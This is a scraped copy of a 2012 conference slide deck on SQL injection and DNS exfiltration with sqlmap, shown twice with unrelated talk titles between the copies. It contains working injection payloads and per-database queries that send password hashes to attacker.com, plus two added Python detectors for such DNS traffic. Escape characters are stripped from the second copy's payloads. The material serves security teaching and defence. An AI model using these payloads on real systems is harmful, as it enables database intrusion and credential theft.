DNS exfiltration using sqlmap

Miroslav Štampar (dev@sqlmap.org)
What is SQL injection?

“SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution”

(source: msdn.microsoft.com)

PHDays 2012, Moscow (Russia)                     May 31, 2012   2
What is SQL injection? (2)
• In plain speak, SQL injection is all about unauthorized database access
• “Hello World” vulnerable code example (PHP/MySQL):
    // user input is concatenated straight into the query string
    $sql = "SELECT * FROM events WHERE id = " . $_GET["id"];
    $result = mysql_query($sql);
• Sample attack:
    http://www.target.com/vuln.php?id=1 AND (SELECT 5502 FROM(SELECT COUNT(*),CONCAT(0x3a,(SELECT password FROM mysql.user LIMIT 0,1),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
What is SQL injection? (3)
• Harder example (PHP/MySQL):
    error_reporting(0);
    set_magic_quotes_runtime(true);
    // non-query statement, errors suppressed, nothing echoed back to the page
    $sql = "INSERT INTO Users (FirstName, LastName, Age) VALUES ('$_REQUEST[firstname]','$_REQUEST[lastname]',$_REQUEST[age])";
    @mysql_query($sql);
Technique classification
• Inband (web page as channel)
    ➢ Union
        ▪ Full
        ▪ Partial
    ➢ Error-based
• Inference (bit-by-bit)
    ➢ Boolean-based blind
    ➢ Time-based (and stacked queries)
• Out-of-band (alternative transport channels)
    ➢ HTTP
    ➢ DNS
Inband techniques
• Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of the subquery result(s) inside the DBMS error message
• Union – UNION ALL SELECT NULL,...,(<subquery>),NULL,NULL,..., fastest, in the FULL variant a whole table dump per request, in the PARTIAL variant 1 query result per request
Inference techniques
• Boolean-based blind – AND 1=1, slow, 1 bit per request, based on page differentiation: a low difference ratio represents a True response, False otherwise (in most common cases)
• Time-based – AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0), slowest, 1 bit per request, a delay represents a True response, False otherwise
• Stacked queries – ;INSERT INTO users VALUES (10, 'test', 'testpass'), usually time-based data retrieval
Out-of-band (OOB) techniques
• HTTP – AND LENGTH(UTL_HTTP.REQUEST('http://www.attacker.com/log.php?q='||(SELECT password FROM SYS.USER$ WHERE name='SYS')))>0, fast, 1 (sub)query result per request, capturing/logging HTTP requests at the other side
• DNS – AND LENGTH(UTL_INADDR.GET_HOST_ADDRESS((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.attacker.com'))>0, relatively fast, 1 part of a (sub)query result per request, capturing/logging DNS requests at the other side
DNS protocol
• relatively simple protocol
• resolving domain names
• UDP datagrams (except zone transfers, which use TCP)
• forwarding requests for arbitrary domain names
• ...even if access to public networks is not allowed :)
DNS protocol (2)
• Name resolving methods:
    ➢ Client lookup – checking the local client's cache (same request already occurred)
    ➢ Iterative – checking the DNS server's cache and configured zone records
    ➢ Recursive – if the other methods fail, the query is forwarded to other servers and the retrieved results are sent back to the client
DNS protocol (3)
DNS exfiltration

“Exfiltration [eks-fil-treyt, eks-fil-treyt]
1. verb (used without object): to escape furtively from an area under enemy control
2. verb (used with object): to smuggle out of an area under enemy control”

(source: dictionary.reference.com)
DNS exfiltration (2)
• When fast inband techniques fail, data is (usually) extracted in a bit-by-bit manner
• Most attackers will avoid exploitation of targets with the time-based technique
• Non-query SQL statements like INSERT/UPDATE/DELETE are especially problematic
• Alternative methods are more than welcome (e.g. uploading of web shell scripts)
• OOB techniques are rarely used (till now)
DNS exfiltration (3)
• In some cases it's possible to incorporate SQL (sub)query results into DNS resolution requests
• Any function that accepts a network address could be used
• Microsoft SQL Server, Oracle, MySQL and PostgreSQL
• Potentially dozens of resulting characters can be transferred per single request
DNS exfiltration (4)
• Microsoft SQL Server:
    DECLARE @host varchar(1024);
    SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa')+'.attacker.com';
    EXEC('master..xp_dirtree "\\'+@host+'\c$"');
DNS exfiltration (5)
• Oracle:
    SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.attacker.com',80) FROM DUAL;
• MySQL:
    SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));
DNS exfiltration (6)
• PostgreSQL:
    DROP TABLE IF EXISTS table_output;
    CREATE TABLE table_output(content text);
    CREATE OR REPLACE FUNCTION temp_function()
    RETURNS VOID AS $$
    DECLARE exec_cmd TEXT;
    DECLARE query_result TEXT;
    BEGIN
        SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE usename='postgres');
        exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.attacker.com\\\\foobar.txt\'';
        EXECUTE exec_cmd;
    END;
    $$ LANGUAGE plpgsql SECURITY DEFINER;
    SELECT temp_function();
DNS exfiltration (7)

DNS exfiltration (8)
Integration into sqlmap
• New command line option: --dns-domain
    ➢ Turns on DNS exfiltration support
    ➢ Domain to which the provoked DNS requests should point (e.g. --dns-domain=attacker.com)
• DNS exfiltration vectors are sent through the previously detected SQLi (e.g. time-based)
• Inband techniques automatically have higher priority
• Hence, usable only in inference-only cases
Integration into sqlmap (2)
• Domain name server entry (e.g. ns1.attacker.com) has to point to the IP address of the machine running sqlmap
    ➢ sqlmap is run as a fake DNS server
    ➢ Serving and logging all incoming DNS requests
    ➢ Dummy responses (e.g. 127.0.0.1) are sent just to unblock the web server instance
Integration into sqlmap (3)
• Each pushed result is enclosed with a unique prefix and suffix (e.g. Xzk. … .iUR.attacker.com)
    ➢ Cancels caching mechanisms
    ➢ Easy to match SQLi requests with DNS results
• Complying with RFC 1034 (Domain Names – Concepts and Facilities)
    ➢ Hex encoding results to preserve non-word chars
    ➢ Splitting long items into parts of length 63 (maximum length of one label)
    ➢ Otherwise DNS resolution requests are immediately dropped as invalid (no resolution)
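The naming scheme just described (short prefix, hex-encoded payload split into labels of at most 63 characters, short suffix, then the controlled domain) is also what a DNS administrator can look for in resolver logs. The following is an added example, not sqlmap's code: a detector that parses BIND 9 style query-log lines, checks the RFC 1034 label limits that force the 63-character split, and decodes names of that shape under a given domain so the data that left the database can be recovered for incident review. The domain attacker.com and the addresses 172.16.138.129/130 are taken from the slides; the log lines, payloads and the marker-length heuristic are constructed for the demo.

```python
"""Detect and decode prefix.<hex labels>.suffix.<domain> names in a BIND 9 query log.

Added example (not part of the slides or of sqlmap). Sample log lines below are
constructed in the BIND 9 "queries" category format, not captured from a real host.
"""
import re
from typing import List, Optional, Tuple

MAX_LABEL_LEN = 63    # RFC 1034/1035: one label carries at most 63 octets
MAX_NAME_LEN = 253    # practical limit for the textual form of a whole name

# Constructed sample: the web/DB host (172.16.138.129) asking the site resolver (172.16.138.130).
SAMPLE_QUERY_LOG = """\
31-May-2012 10:15:01.123 queries: info: client 172.16.138.129#53121: query: www.example.com IN A + (172.16.138.130)
31-May-2012 10:15:01.201 queries: info: client 172.16.138.129#53122: query: Xzk.696e666f726d6174696f6e5f736368656d61.iUR.attacker.com IN A + (172.16.138.130)
31-May-2012 10:15:02.002 queries: info: client 172.16.138.129#53123: query: Qpa.312c757466385f67656e6572616c5f63692c757466382c33332c5965732c596.5732c31.Lm9.attacker.com IN A + (172.16.138.130)
31-May-2012 10:15:02.310 queries: info: client 172.16.138.129#53124: query: mail.attacker.com IN MX + (172.16.138.130)
"""

_QUERY_RE = re.compile(
    r"client (?P<client>\d+\.\d+\.\d+\.\d+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)
_HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
# Heuristic (assumption, not a sqlmap constant): the prefix/suffix markers are short alphanumerics.
_MARKER_RE = re.compile(r"^[A-Za-z0-9]{1,8}$")


def parse_bind_query(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (client_ip, qname, qtype) from one BIND query-log line, or None if it is not a query."""
    m = _QUERY_RE.search(line)
    if not m:
        return None
    return m.group("client"), m.group("qname").rstrip("."), m.group("qtype")


def labels_ok(qname: str) -> bool:
    """True if every label is 1..63 chars and the whole name fits in 253 chars.

    This is the limit that forces the 63-character split: a name that breaks it is
    rejected by the resolver library on the sending host before any packet goes out.
    """
    labels = qname.split(".")
    return len(qname) <= MAX_NAME_LEN and all(1 <= len(l) <= MAX_LABEL_LEN for l in labels)


def decode_exfil_name(qname: str, domain: str) -> Optional[Tuple[str, str, bytes]]:
    """If qname looks like <prefix>.<hex label(s)>.<suffix>.<domain>, return
    (prefix, suffix, decoded_bytes); otherwise return None."""
    suffix_dom = "." + domain.lower()
    if not qname.lower().endswith(suffix_dom) or not labels_ok(qname):
        return None
    labels = qname[: -len(suffix_dom)].split(".")
    if len(labels) < 3:                       # need marker, payload, marker
        return None
    prefix, hex_labels, suffix = labels[0], labels[1:-1], labels[-1]
    if not (_MARKER_RE.match(prefix) and _MARKER_RE.match(suffix)):
        return None
    if not all(_HEX_RE.match(l) for l in hex_labels):
        return None
    payload_hex = "".join(hex_labels)         # labels were split at 63 chars; re-join before decoding
    if len(payload_hex) % 2:
        return None
    return prefix, suffix, bytes.fromhex(payload_hex)


def scan_query_log(log_text: str, domain: str) -> List[dict]:
    """Run the detector over a query log and return one finding per matching query."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_bind_query(line)
        if not parsed:
            continue
        client, qname, qtype = parsed
        decoded = decode_exfil_name(qname, domain)
        if decoded is None:
            continue
        prefix, suffix, payload = decoded
        findings.append({
            "client": client,
            "qtype": qtype,
            # the unique prefix/suffix pair is what lets an analyst pair this DNS query
            # with the web request that provoked it (web logs carry the same markers)
            "marker": (prefix, suffix),
            "payload": payload.decode("utf-8", errors="replace"),
        })
    return findings


if __name__ == "__main__":
    for f in scan_query_log(SAMPLE_QUERY_LOG, "attacker.com"):
        print(f"{f['client']} {f['marker']} -> {f['payload']!r}")
```

On the constructed log the two marked names decode to `information_schema` and to one COLLATIONS-style row, while the ordinary A and MX lookups are ignored; in production the domain argument would be replaced by an allow-list comparison or by flagging any name whose middle labels are all hexadecimal.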
Experimental setup
1) Attacker (172.16.138.1)
    ➢ physical machine – Ubuntu 12.04 LTS 64-bit OS
    ➢ sqlmap v1.0-dev (r5100)
2) Web Server (172.16.138.129)
    ➢ virtual machine – Windows XP 32-bit SP1 OS
    ➢ XAMPP 1.7.3 with SQLi vulnerable MySQL/PHP web application
3) DNS Server (172.16.138.130)
    ➢ virtual machine – CentOS 6.2 64-bit OS
    ➢ BIND9 DNS daemon
Results
(--dump -T COLLATIONS -D information_schema)

Method                  # of requests   Time (sec)
Boolean-based blind     29,212          214.04
Time-based (1 sec)      32,716          17,720.51
Error-based             777             9.02
Union (full/partial)    3/136           0.70/2.50
DNS exfiltration        1,409           35.31
Video presentation

Questions?
Why Teams call analytics are critical to your entire business
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 

DNS exfiltration using sqlmap

  • 1. DNS exfiltration using sqlmap
    Miroslav Štampar (dev@sqlmap.org)
  • 2. What is SQL injection?
    “SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution” (source: msdn.microsoft.com)
    PHDays 2012, Moscow (Russia), May 31, 2012
  • 3. What is SQL injection? (2)
    - In plain speak, SQL injection is all about unauthorized database access
    - “Hello World” vulnerable code example (PHP/MySQL):
        $sql = "SELECT * FROM events WHERE id = " . $_GET["id"];
        $result = mysql_query($sql);
    - Sample attack:
        http://www.target.com/vuln.php?id=1 AND (SELECT 5502 FROM(SELECT COUNT(*),CONCAT(0x3a,(SELECT password FROM mysql.user LIMIT 0,1),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  • 4. What is SQL injection? (3)
    - Harder example (PHP/MySQL):
        error_reporting(0);
        set_magic_quotes_runtime(true);
        $sql = "INSERT INTO Users (FirstName, LastName, Age) VALUES ('$_REQUEST[firstname]','$_REQUEST[lastname]',$_REQUEST[age])";
        @mysql_query($sql);
  • 5. Technique classification
    - Inband (web page as channel)
        - Union
            - Full
            - Partial
        - Error-based
    - Inference (bit-by-bit)
        - Boolean-based blind
        - Time-based (and stacked queries)
    - Out-of-band (alternative transport channels)
        - HTTP
        - DNS
  • 6. Inband techniques
    - Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of subquery result(s) inside the DBMS error message
    - Union – UNION ALL SELECT NULL,...,(<subquery>),NULL,NULL,..., fastest; in the FULL variant a whole table dump per request, in the PARTIAL variant 1 query result per request
  • 7. Inference techniques
    - Boolean-based blind – AND 1=1, slow, 1 bit per request, based on page differentiation: a low difference ratio represents a True response, False otherwise (in most common cases)
    - Time-based – AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0), slowest, 1 bit per request, a delay represents a True response, False otherwise
    - Stacked queries – ;INSERT INTO users VALUES (10, 'test', 'testpass'), usually time-based data retrieval
  • 8. Out-of-band (OOB) techniques
    - HTTP – AND LENGTH(UTL_HTTP.REQUEST('http://www.attacker.com/log.php?q='||(SELECT password FROM SYS.USER$ WHERE name='SYS')))>0, fast, 1 (sub)query result per request, capturing/logging HTTP requests at the other side
    - DNS – AND LENGTH(UTL_INADDR.GET_HOST_ADDRESS((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.attacker.com'))>0, relatively fast, 1 part of a (sub)query result per request, capturing/logging DNS requests at the other side
  • 9. DNS protocol
    - relatively simple protocol
    - resolving domain names
    - UDP datagrams (except zone transfers, which use TCP)
    - forwarding requests for arbitrary domain names
    - ...even if access to public networks is not allowed :)
  • 10. DNS protocol (2)
    - Name resolving methods:
        - Client lookup – checking the local client's cache (same request already occurred)
        - Iterative – checking the DNS server's cache and configured zone records
        - Recursive – if other methods fail, the query is forwarded to others, and retrieved results are sent back to the client
  • 11. DNS protocol (3)
    (diagram slide, no transcribed text)
  • 12. DNS exfiltration
    “Exfiltration [eks-fil-treyt, eks-fil-treyt] 1. verb (used without object) to escape furtively from an area under enemy control 2. verb (used with object) to smuggle out of an area under enemy control” (source: dictionary.reference.com)
  • 13. DNS exfiltration (2)
    - When fast inband techniques fail, data is (usually) extracted in a bit-by-bit manner
    - Most attackers will avoid exploitation of targets with the time-based technique
    - Non-query SQL statements like INSERT/UPDATE/DELETE are especially problematic
    - Alternative methods are more than welcome (e.g. uploading of web shell scripts)
    - OOB techniques are rarely used (till now)
  • 14. DNS exfiltration (3)
    - In some cases it's possible to incorporate SQL (sub)query results into DNS resolution requests
    - Any function that accepts a network address could be used
    - Microsoft SQL Server, Oracle, MySQL and PostgreSQL
    - Potentially dozens of resulting characters can be transferred per single request
  • 15. DNS exfiltration (4)
    - Microsoft SQL Server:
        DECLARE @host varchar(1024);
        SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa')+'.attacker.com';
        EXEC('master..xp_dirtree "'+@host+'c$"');
  • 16. DNS exfiltration (5)
    - Oracle:
        SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.attacker.com',80) FROM DUAL;
    - MySQL:
        SELECT LOAD_FILE(CONCAT('',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.comfoobar'));
  • 17. DNS exfiltration (6)
    - PostgreSQL:
        DROP TABLE IF EXISTS table_output;
        CREATE TABLE table_output(content text);
        CREATE OR REPLACE FUNCTION temp_function()
        RETURNS VOID AS $$
        DECLARE exec_cmd TEXT;
        DECLARE query_result TEXT;
        BEGIN
            SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE usename='postgres');
            exec_cmd := E'COPY table_output(content) FROM E''|| query_result||E'.attacker.comfoobar.txt'';
            EXECUTE exec_cmd;
        END;
        $$ LANGUAGE plpgsql SECURITY DEFINER;
        SELECT temp_function();
  • 18. DNS exfiltration (7)
    (slide contains no transcribed text)
  • 19. DNS exfiltration (8)
    (slide contains no transcribed text)
  • 20. Integration into sqlmap
    - New command line option: --dns-domain
        - Turns on DNS exfiltration support
        - Domain that the provoked DNS requests should point to (e.g. --dns-domain=attacker.com)
    - DNS exfiltration vectors are sent through a previously detected SQLi (e.g. time-based)
    - Inband techniques automatically have higher priority
    - Hence, usable only in inference-only cases
  • 21. Integration into sqlmap (2)
    - The domain name server entry (e.g. ns1.attacker.com) has to point to the IP address of the machine running sqlmap
        - sqlmap is run as a fake DNS server
        - Serving and logging all incoming DNS requests
        - Dummy responses (e.g. 127.0.0.1) are sent just to unblock the web server instance
  • 22. Integration into sqlmap (3)
    - Each pushed result is enclosed with a unique prefix and suffix (e.g. Xzk. … .iUR.attacker.com)
        - Cancels caching mechanisms
        - Easy to match SQLi requests with DNS results
    - Complying with RFC 1034 (Domain Names – Concepts and Facilities)
        - Hex encoding results to preserve non-word chars
        - Splitting long items into parts of length 63 (maximum length of one label name)
        - Otherwise DNS resolution requests are immediately dropped as invalid (no resolution)
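Added example (not sqlmap's own code) showing what the logging side on slides 21–22 has to do with a captured request: parse the QNAME out of a raw DNS query while enforcing the 63-octet label limit from RFC 1034, reassemble the hex parts between the Xzk/iUR markers, and, for DNS logs where no markers are known, flag long all-hex labels as a detection heuristic. The prefix, suffix, domain and exfiltrated value are constructed.

```python
import re
import struct
from typing import List, Optional

# Constructed values: the talk's example markers and a made-up domain/secret.
PREFIX, SUFFIX, DOMAIN = "Xzk", "iUR", "attacker.com"
HEX_LABEL = re.compile(r"^[0-9a-fA-F]{32,63}$")  # long, all-hex label heuristic

def parse_qname(packet: bytes) -> List[str]:
    """Return the labels of the first question in a raw DNS query.
    The 12-byte header (RFC 1035) is followed by length-prefixed labels."""
    qdcount = struct.unpack("!H", packet[4:6])[0]
    if qdcount < 1:
        raise ValueError("no question section")
    labels, pos = [], 12
    while True:
        length = packet[pos]
        if length == 0:
            return labels
        if length > 63:  # RFC 1034: one label is at most 63 octets
            raise ValueError("invalid label length %d" % length)
        pos += 1
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length

def decode_exfil(labels: List[str]) -> Optional[bytes]:
    """Reassemble the value if the name is <prefix>.<hex parts>.<suffix>.<domain>."""
    domain = DOMAIN.split(".")
    if labels[-len(domain):] != domain or len(labels) < len(domain) + 3:
        return None
    body = labels[:-len(domain)]
    if body[0] != PREFIX or body[-1] != SUFFIX:
        return None
    return bytes.fromhex("".join(body[1:-1]))  # parts were split at 63 chars

def looks_like_hex_exfil(labels: List[str]) -> bool:
    """Detection heuristic for query logs where prefix/suffix are unknown."""
    return any(HEX_LABEL.match(label) for label in labels)

def build_query(labels: List[str], txid: int = 0x1234) -> bytes:
    """Minimal A/IN query for the labels, used only to construct the sample."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)

# Constructed sample: a 35-byte value hex-encodes to 70 chars, so it is
# carried as one 63-char label plus a 7-char label between the markers.
SECRET = b"constructed-sample-value-0123456789"
_hexed = SECRET.hex()
SAMPLE_LABELS = ([PREFIX] + [_hexed[i:i + 63] for i in range(0, len(_hexed), 63)]
                 + [SUFFIX] + DOMAIN.split("."))
SAMPLE_QUERY = build_query(SAMPLE_LABELS)
```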
  • 23. Experimental setup
    1) Attacker (172.16.138.1)
        ➢ physical machine – Ubuntu 12.04 LTS 64-bit OS
        ➢ sqlmap v1.0-dev (r5100)
    2) Web Server (172.16.138.129)
        ➢ virtual machine – Windows XP 32-bit SP1 OS
        ➢ XAMPP 1.7.3 with an SQLi-vulnerable MySQL/PHP web application
    3) DNS Server (172.16.138.130)
        ➢ virtual machine – CentOS 6.2 64-bit OS
        ➢ BIND9 DNS daemon
  • 24. Results (--dump -T COLLATIONS -D information_schema)
    Method                  # of requests   Time (sec)
    Boolean-based blind     29,212          214.04
    Time-based (1 sec)      32,716          17,720.51
    Error-based             777             9.02
    Union (full/partial)    3/136           0.70/2.50
    DNS exfiltration        1,409           35.31
  • 25. Video presentation
  • 26. Questions?